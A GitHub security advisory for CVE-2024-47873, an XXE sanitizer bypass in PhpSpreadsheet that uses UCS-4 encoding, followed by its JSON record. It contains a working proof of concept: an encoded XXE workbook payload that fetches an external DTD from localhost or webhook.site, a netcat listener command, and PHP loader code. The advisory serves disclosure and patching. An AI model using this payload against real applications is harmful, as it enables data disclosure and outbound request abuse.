ghsa-jw4x-v69f-hh5w
Vulnerability from github
Summary
The `XmlScanner` class has a `scan` method which should prevent XXE attacks.
However, the regexes used in the `scan` method and the `findCharSet` method can be bypassed by using UCS-4 and encoding guessing as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
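To make the "encoding guessing" step concrete, here is a minimal sketch of how a parser can infer the encoding family from the first bytes of a document, using the byte patterns listed in the referenced appendix of the XML specification. The function name `guessXmlEncodingFamily` is hypothetical and is not part of PhpSpreadsheet; the table covers only the common signatures (no EBCDIC or unusual byte orders).

```php
<?php
// Hypothetical helper: map the leading bytes of an XML document to an
// encoding family. Longer signatures are listed before the shorter ones
// they start with (FF FE 00 00 before FF FE).
function guessXmlEncodingFamily(string $xml): string
{
    $signatures = [
        "\x00\x00\xFE\xFF" => 'UCS-4 big-endian (BOM)',
        "\xFF\xFE\x00\x00" => 'UCS-4 little-endian (BOM)',
        "\x00\x00\x00\x3C" => 'UCS-4 big-endian',
        "\x3C\x00\x00\x00" => 'UCS-4 little-endian',
        "\x00\x3C\x00\x3F" => 'UTF-16 big-endian',
        "\x3C\x00\x3F\x00" => 'UTF-16 little-endian',
        "\xEF\xBB\xBF"     => 'UTF-8 (BOM)',
        "\xFE\xFF"         => 'UTF-16 big-endian (BOM)',
        "\xFF\xFE"         => 'UTF-16 little-endian (BOM)',
        "\x3C\x3F\x78\x6D" => 'ASCII-compatible (read the declaration)',
    ];

    foreach ($signatures as $prefix => $family) {
        // strncmp is binary safe, so null bytes in the prefix are fine.
        if (strncmp($xml, $prefix, strlen($prefix)) === 0) {
            return $family;
        }
    }

    return 'unknown (assume UTF-8)';
}
```

A document that starts with the bytes `00 00 00 3C` is therefore treated as UCS-4 by a conforming parser even if a byte-oriented filter never sees a readable `encoding="..."` declaration.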
Details
The `scan` method converts the input to UTF-8 with the `toUtf8` method if it is not already UTF-8 encoded.
Then, the `scan` method uses a regex which would also work with 16-bit encodings.
However, the regexes in the `findCharSet` method, which determines the current encoding, can be bypassed by using an encoding with more than 8 bits per character: the regexes do not expect null bytes between characters, so the encoding declaration is not matched, while the XML library still autodetects the encoding as described in https://www.w3.org/TR/xml/#sec-guessing-no-ext-info.
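The effect of the null bytes can be illustrated with a small, self-contained sketch. The two patterns below are assumptions written for illustration, not the library's exact regexes: one looks for a plain `encoding="..."` declaration, the other tolerates at most one null byte between the characters of `<!DOCTYPE` (which is what "would also work with 16-bit encoding" suggests). The helper `asciiToBigEndian` is hypothetical and only handles ASCII input.

```php
<?php
// Encode ASCII-only text as big-endian fixed-width code units
// (1 = ASCII, 2 = UTF-16BE, 4 = UCS-4/UTF-32BE).
function asciiToBigEndian(string $ascii, int $bytesPerChar): string
{
    $padding = str_repeat("\x00", $bytesPerChar - 1);
    $out = '';
    foreach (str_split($ascii) as $char) {
        $out .= $padding . $char;
    }
    return $out;
}

// Assumed patterns, for illustration only.
$encodingPattern = '/encoding\s*=\s*"([^"]*)"/';
$doctypePattern  = '/\0?' . implode('\0?', str_split('<!DOCTYPE')) . '\0?/';

$xml = '<?xml version="1.0" encoding="UTF-16"?><!DOCTYPE message [ ]><message/>';

$results = [];
foreach (['ASCII' => 1, 'UTF-16BE' => 2, 'UCS-4BE' => 4] as $label => $width) {
    $bytes = asciiToBigEndian($xml, $width);
    $results[$label] = [
        'encoding' => preg_match($encodingPattern, $bytes),
        'doctype'  => preg_match($doctypePattern, $bytes),
    ];
}

print_r($results);
```

With these assumed patterns, the ASCII input matches both, the UTF-16BE input is still caught by the DOCTYPE pattern, and the UCS-4BE input matches neither, because three null bytes separate every pair of characters.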
A payload for the `workbook.xml` file can, for example, be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-32BE%20(12001)')&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).
If PhpSpreadsheet opens an Excel file whose `workbook.xml` file contains the payload from the link above, an HTTP request is sent to `127.0.0.1:12345`. To observe the request, run the `nc -nlvp 12345` command before opening the file with PhpSpreadsheet.
PoC
- Create a new folder.
- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.
- Create an `index.php` file in that folder with the following content:
```PHP
<?php
require 'vendor/autoload.php';

use PhpOffice\PhpSpreadsheet\Spreadsheet;
use PhpOffice\PhpSpreadsheet\Writer\Xlsx;

$spreadsheet = new Spreadsheet();

$inputFileType = 'Xlsx';
$inputFileName = './payload.xlsx';

/** Create a new Reader of the type defined in $inputFileType **/
$reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
/** Advise the Reader that we only want to load cell data **/
$reader->setReadDataOnly(true);

$worksheetData = $reader->listWorksheetInfo($inputFileName);

foreach ($worksheetData as $worksheet) {
    $sheetName = $worksheet['worksheetName'];

    echo "<h4>$sheetName</h4>";
    /** Load $inputFileName to a Spreadsheet Object **/
    $reader->setLoadSheetsOnly($sheetName);
    $spreadsheet = $reader->load($inputFileName);

    $worksheet = $spreadsheet->getActiveSheet();
    print_r($worksheet->toArray());
}
```
- Run the following command: `php -S 127.0.0.1:8080`
- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file to the folder. It contains a payload similar to the one from the Details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL. Then open http://127.0.0.1:8080 in a browser. You will see an HTTP request on https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a.
Impact
An attacker can bypass the sanitizer and achieve an XXE attack.
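To check whether a given PhpSpreadsheet version falls into one of the affected ranges listed in the advisory record (fixed in 1.29.4, 2.1.3, 2.3.2 and 3.4.0), a minimal sketch using PHP's built-in `version_compare` could look like this. The constant and function names are hypothetical; the range boundaries are copied from the advisory data as published.

```php
<?php
// [introduced, fixed] pairs taken from the advisory's affected ranges.
const AFFECTED_RANGES = [
    ['0',     '1.29.4'],
    ['2.0.0', '2.1.3'],
    ['2.2.0', '2.3.2'],
    ['3.3.0', '3.4.0'],
];

// Returns true if $version is >= introduced and < fixed for any range.
function isAffectedVersion(string $version): bool
{
    foreach (AFFECTED_RANGES as [$introduced, $fixed]) {
        if (
            version_compare($version, $introduced, '>=')
            && version_compare($version, $fixed, '<')
        ) {
            return true;
        }
    }
    return false;
}
```

The installed version can be read, for example, from the output of `composer show phpoffice/phpspreadsheet` and passed to the function.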
{ "affected": [ { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.29.4" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.0.0" }, { "fixed": "2.1.3" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "2.2.0" }, { "fixed": "2.3.2" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Packagist", "name": "phpoffice/phpspreadsheet" }, "ranges": [ { "events": [ { "introduced": "3.3.0" }, { "fixed": "3.4.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-47873" ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2024-11-18T20:01:20Z", "nvd_published_at": "2024-11-18T17:15:11Z", "severity": "HIGH" }, "details": "### Summary\nThe [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method which should prevent XXE attacks.\n\nHowever, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\n\n### Details\nThe `scan` method converts the input in the UTF-8 encoding if it is not already in the UTF-8 encoding with the [`toUtf8` 
method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76).\nThen, the `scan` method uses a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) which would also work with 16-bit encoding.\n\nHowever, the regexes from the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used for determining the current encoding can be bypassed by using an encoding which has more than 8 bits, since the regex does not expect null bytes, and the XML library will also autodetect the encoding as described in \u003chttps://www.w3.org/TR/xml/#sec-guessing-no-ext-info\u003e.\n\nA payload for the `workbook.xml` file can for example be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text(\u0027UTF-32BE%20(12001)\u0027)\u0026input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgc
jppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.).\nIf you open an Excel file containing the payload from the link above stored in the `workbook.xml` file with PhpSpreadsheet, you will receive an HTTP request on `127.0.0.1:12345`. You can test that an HTTP request is created by running the `nc -nlvp 12345` command before opening the file containing the payload with PhpSpreadsheet.\n\n### PoC\n\n- Create a new folder.\n- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.\n- Create an `index.php` file in that folder with the following content:\n```PHP\n\u003c?php\nrequire \u0027vendor/autoload.php\u0027;\n\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Xlsx;\n\n$spreadsheet = new Spreadsheet();\n\n$inputFileType = \u0027Xlsx\u0027;\n$inputFileName = \u0027./payload.xlsx\u0027;\n\n/** Create a new Reader of the type defined in $inputFileType **/\n$reader = \\PhpOffice\\PhpSpreadsheet\\IOFactory::createReader($inputFileType);\n/** Advise the Reader that we only want to load cell data **/\n$reader-\u003esetReadDataOnly(true);\n\n$worksheetData = $reader-\u003elistWorksheetInfo($inputFileName);\n\nforeach ($worksheetData as $worksheet) {\n\n$sheetName = $worksheet[\u0027worksheetName\u0027];\n\necho \"\u003ch4\u003e$sheetName\u003c/h4\u003e\";\n/** Load $inputFileName to a Spreadsheet Object **/\n$reader-\u003esetLoadSheetsOnly($sheetName);\n$spreadsheet = $reader-\u003eload($inputFileName);\n\n$worksheet = $spreadsheet-\u003egetActiveSheet();\nprint_r($worksheet-\u003etoArray());\n\n}\n```\n- Run the following command: `php -S 127.0.0.1:8080`\n- Add the 
[payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file, which contains a payload similar to the payload from the details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of the `http://127.0.0.1:12345/ext.dtd` URL, in the folder and open \u003chttps://127.0.0.1:8080\u003e in a browser. You will see an HTTP request on \u003chttps://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a\u003e.\n\n### Impact\nAn attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).\n", "id": "GHSA-jw4x-v69f-hh5w", "modified": "2024-11-18T20:01:20Z", "published": "2024-11-18T20:01:20Z", "references": [ { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47873" }, { "type": "PACKAGE", "url": "https://github.com/PHPOffice/PhpSpreadsheet" }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php" }, { "type": "WEB", "url": "https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing" }, { "type": "WEB", "url": "https://www.w3.org/TR/xml/#sec-guessing-no-ext-info" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "type": "CVSS_V3" } ], "summary": "XmlScanner bypass leads to XXE" }